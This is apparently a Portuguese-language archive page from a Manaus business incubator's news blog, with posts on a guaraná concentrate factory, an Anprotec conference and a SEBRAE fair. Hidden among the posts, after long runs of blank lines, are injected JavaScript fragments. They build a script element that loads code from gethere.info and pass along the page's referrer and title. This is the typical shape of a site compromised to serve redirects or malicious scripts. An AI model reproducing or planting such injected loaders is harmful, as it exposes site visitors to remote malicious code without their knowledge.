• 92 3216-3892
  • secretaria@cide.org.br

Arquivos por mêsnovembro 2016

Concentrado de guaraná com o gosto do cliente

O gestor, Marcos Ferrari, é o encarregado de instalar a empresa no CIDE

O gestor, Marcos Ferrari, é o encarregado de instalar a empresa no CIDE

 

 

Tem sobrenome de carro italiano, Marcos Ferrari, e sempre trabalhou em cargos importantes de empresas de refrigerantes por todo o Brasil, inclusive em Manaus.

 

É o gestor que vai inaugurar, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), no mês de dezembro, a fábrica de concentrados para refrigerantes, chamada Antares, que pretende atender às indústrias de bebidas não alcoólicas locais e nacionais.

 

Com a instalação da fábrica, no Cide, Marcos Ferrari vai trazer o guaraná de Maués (município a 268 quilómetros de Manaus em linha reta) e transformá-lo em concentrados para bebidas. “Esse mercado de bebidas é muito grande. Então, o que nós vamos fazer é vender o concentrado para que as empresas de bebidas produzam o refrigerante de guaraná e outros sabores”, conta o diretor.

 

Ainda conforme Ferrari, já surgiram empresas fabricantes de refrigerantes interessadas em adquirir o produto regional da Antares. “O guaraná é um produto regional e mundial, mas nós vamos produzir concentrados também para refrigerantes de uva, laranja, enérgicos, sucos, chás, etc., de acordo com o gosto do cliente, ou seja, personalizado. Podemos fazer uma fórmula exclusiva para o cliente”, diz, acrescentando que a análise do produto será feita por um laboratório que também está instalado no CIDE, o CQLab.

 

CONCENTRADOS são misturas de extratos, óleos e destilados de frutas ou vegetais. É o “coração” do refrigerante.

 

Composição do refrigerante

Água com gás, açúcar, aroma, acidulantes e conservantes. Todos esses ingredientes são misturados para a fabricação do refrigerante.

A Antares vai concentrar todos esses ingredientes, exceto a água com gás e o açúcar.

 

A vantagem de estar no CIDE

Segundo o gestor, Ferrari, a decisão de incubar-se no CIDE partiu do fato de que a incubadora oferece uma estrutura invejável. “Estamos em um cenário em que a tendência é melhorar e realizamos um estudo de viabilidade antes de tomar a decisão de empreender. Eu já tinha ouvido falar do CIDE e conhecia o processo de incubação. Aqui nós temos um espaço com auditório, sala de reuniões, segurança, enfim, uma estrutura necessária para qualquer empresa”, conclui.

 

Para saber mais

email: ferrari.antaresconcentrados.com.br

Tel. 98112-8877

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

CIDE participa da 26ª Conferência da Anprotec

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas.

Representante do CIDE, Rosália Padilha (de vermelho, à dir.), e gestores de outras incubadoras do Amazonas

 

 

A 26ª Conferência Anprotec reuniu cerca de 650 empreendedores, representantes de incubadoras de empreas, gestores de ambientes de inovação, representantes do governo e do setor privado, estudantes e especialistas de todos os Estados brasileiros e de outros países em Fortaleza (CE). Durante três dias, de 17 a 20 de outubro, os participantes assistiram plenárias, minicursos, realizaram networking e interagiram no 4º Fórum Sebrae de Inovação. O Centro de Incubação e Desenvolvimento Empresarial (CIDE) foi representado por Rosália Padilha.

 

Negócios de impacto social ganharam espaço nas discussões. “Dentro desse contexto a Conferência foi bem aproveitada, assim como a rede de relacionamentos, contatos com reciprocidade de outras incubadoras e parques tecnológicos”, diz a representante do CIDE.

 

Além de participar de cursos e Workshops de sistemas de inovação, os representantes de incubadoras realizaram visitas técnicas a parques tecnológicos do Ceará. “Essas iniciativas tratadas por especialistas experientes, abordando temas relevantes no ambiente empresarial e inovador estimulará a reflexão e maior conhecimento para os desafios do nosso cotidiano, sejam nas incubadoras, universidades, parques tecnológicos, ICTs, empresas e entidades atuantes em inovação”, finaliza Rosália.

Goiânia é eleita

O terceiro dia de atividades da 26ª Conferência Anprotec em Fortaleza (CE) foi finalizado com a assembleia geral da Associação. A atividade teve início com a apresentação das candidaturas que concorreram para sediar a Conferência de 2018. Tanto a equipe de Goiânia (GO), quanto a de Gramado (RS) tiveram 10 minutos para argumentar a favor de suas cidades. Após as explanações, o presidente da Anprotec, Jorge Audy, convidou todos os participantes para votarem em uma das duas candidaturas.

 

A cidade vencedora foi Goiânia, que abrigará a 28ª Conferência Anprotec em 2018. Após as comemorações, Aline Figliolo, Superintendente de Tecnologia e Inovação da Secretaria de Ciência e Tecnologia de Goiânia, afirmou que a Conferência de 2018 será muito agregadora regionalmente. “Este é um evento de todo centro oeste e de todo o Brasil”.

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

Os participantes assistiram plenárias, minicursos, realizaram networking e interagiram

 

 

 

Representante do CIDE, Rosália Padilha, conheceu incubadoras e interagiu com empresariado em Fortaleza

Representante do CIDE, Rosália Padilha, conheceu e interagiu com empresariado de outras incubadoras em Fortaleza

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

var d=document;var s=d.createElement(‘script’);

Empresariado do CIDE é convidado para feira regional do SEBRAE

Técnico do Sebrae, empresariado do CIDE e administração da incubadora discutem participação em evento.

Técnico do Sebrae, empresariado do CIDE e administração da incubadora discutem participação em evento.

 

 

O Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE) esteve no Centro de Incubação e Desenvolvimento Empresarial (CIDE), em outubro, com o objetivo de fazer uma prospecção de empresas, instaladas na própria incubadora, para a possível participação no evento Empório de Natal, que reúne empreendedores que usam ingredientes regionais em seus produtos.

O evento acontece nos dias 30 de novembro, 1 e 2 de dezembro, na frente da sede do Sebrae, situada na Leonardo Malcher, Centro. “Fizemos uma visita, falamos com cada empresário e faremos uma seleção dos que querem participar do evento”, diz o analista técnico da Unidade de Agronegócios do Sebrae, Leocy Cutrim.

Antes de expor seus produtos regionais, cada empresário participará de cursos, como o curso de Atendimento ao Cliente e Boas Práticas de Manipulação de Alimentos. “A intenção é preparar, capacitar esses empreendedores para que eles estejam aptos a melhorar o seu próprio negócio”, finaliza Leocy.

 

Atender bem é um diferencial

 Qualidade, agilidade e cortesia são pré-requisitos para que isso aconteça. Tanto o empreendedor como a equipe de atendimento devem identificar o cliente e suas necessidades, assim como ter tranquilidade para lidar com queixas e reclamações e, principalmente, habilidade para solucionar os problemas.

Para preservar a imagem positiva do estabelecimento, a comunicação entre a equipe de atendimento e a clientela precisa ser efetiva e clara. Da mesma forma, apresente prontidão, disposição, esforço, cordialidade e superação cada vez que o seu cliente estiver na loja.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;